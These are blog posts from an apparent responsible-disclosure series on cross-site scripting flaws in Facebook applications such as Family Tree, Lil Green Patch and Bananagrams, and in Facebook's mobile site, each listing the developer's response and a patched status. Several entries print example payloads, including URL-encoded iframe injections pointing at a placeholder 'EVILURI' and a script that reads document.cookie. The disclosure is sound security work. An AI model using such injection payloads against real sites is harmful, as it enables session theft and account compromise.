Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Family Tree
Facebook Verified Application
Current Monthly Active Users: 5,024,914
Current Rank on Application Leaderboard: 30
Application Developer: Familybuilder
Responsiveness: Familybuilder responded quickly, patched all the issues within a day or two, and sent updates on their progress.
Vulnerability Status: Patched
Capable of Clickjacking Install: Uncertain
Technical Details:
- If a person wrote a comment on a user’s Family Feed containing FBML, that code would then be rendered when the feed was loaded, e.g. <fb:iframe src=’http://google.com/‘>.
- If a user included FBML in sections of his/her Facebook profile information, this would be rendered when someone viewed the “Info” tab of the user’s Family Tree profile.
- If a user inserted an FBML iframe that then referenced the direct URI of their Family Tree profile, this would in turn load malicious scripts embedded in the Family Tree page. For example, inserting <fb:iframe src=”http://fb.apps.familybuilder.com/newfamilytree/scripts/profileInfo.php?profileid=PROFILENUM“> and <script>alert(document.cookie);</script> in a user’s Facebook profile, with the correct Family Tree profile number filled in, would have displayed the cookies on loading the “Info” tab.
Notes: This is an example of a persistent XSS hole – a bug I had not been looking for, but after Tom Eston found one in another application (to be posted later this week), I began keeping an eye out for them.
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack Break: More Facebook XSS
Today I’m going to take a break from posting application holes, though not due to lack of material. I have several vulnerabilities ready to post, but I’m giving developers time to ensure their applications are secure. A few requests forced me to adjust my schedule, so I’ll make up for today’s omission in the future.
In the mean time, I thought I would share another Facebook bug that security researcher Pierre Gardenat sent to me. Full credit for this bug goes to Gardenat.
Earlier this year, he published a paper (PDF, French) on XSS vulnerabilities within Facebook itself. As his paper notes, Facebook did issue fixes, but only at the presentation layer. Facebook apparently did not take steps to identify harmful code already stored in their databases, or provide filters to avoid more code from being inserted.
Consequently, another attack vector surfaced when another facet of the presentation layer remained unpatched. First, a user could enter script tags with code in the screen name field of their profile’s contact information. Visiting Facebook in a desktop browser would not load the script, as presentation layer filters prevented it from being rendered as script. However, the mobile version of Facebook at m.facebook.com did not have such protections, and the script would execute fine.
This is an example of a persistent XSS hole, as opposed to the reflected XSS holes I’ve been posting so far. The attack code is stored within the application and loaded whenever a user visits a page that loads the code. In some ways this type of attack is more powerful than a standard reflected XSS attack.
Facebook has, of course, patched the mobile site now. But understanding the layers involved in dealing with XSS holes is an important lesson. And it’s one Facebook applications should not ignore, since they too can become susceptible to persistent XSS holes. In fact, two applications (one a Facebook Verified Application) vulnerable in this way have already been discovered, and I plan on posting details of the problems later this week as FAXX hacks.
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: (Lil) Green Patch
Facebook Verified Application
Current Monthly Active Users: 2,400,608
Current Rank on Application Leaderboard: 64
Application Developer: Green Patch
Responsiveness: Green Patch did not send any messages, but did patch the hole.
Vulnerability Status: Patched
Capable of Clickjacking Install: Uncertain
Example URI: http://apps.facebook.com/greentrees/house.php?userId=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%2F%22%3E
Notes: This example URI once again does not include a standard double-injection trick. But I was unable to create such an exploit not because of a server whitelist or secure code. In fact, quite the opposite was true – nearly every time I tried to insert FBML or HTML into various pages, I ended up getting SQL errors. It quickly became clear that multiple SQL injection holes existed in this application. In this case, such problems weren’t entirely serious for users, as attacks would be accessing the application database, which does not store any sensitive information. Still, it’s disconcerting to find so many SQL injection holes in a Facebook Verified Application with over 2 million monthly active users.
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Bananagrams
Sorry for not posting yesterday – I’ll post another FAXX Hack in a bit to make up for it.
Facebook Verified Application
Current Monthly Active Users: 22,215
Current Rank on Application Leaderboard: 1,165
Application Developer: Large Animal Games
Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/bananagrams/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Lucky Strike Lanes
Facebook Verified Application
Current Monthly Active Users: 83,243
Current Rank on Application Leaderboard: 539
Application Developer: Large Animal Games
Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/luckystrikelanes/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E
Keep Reading »Content License
All content by theharmonyguy on this site, including text and images, is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.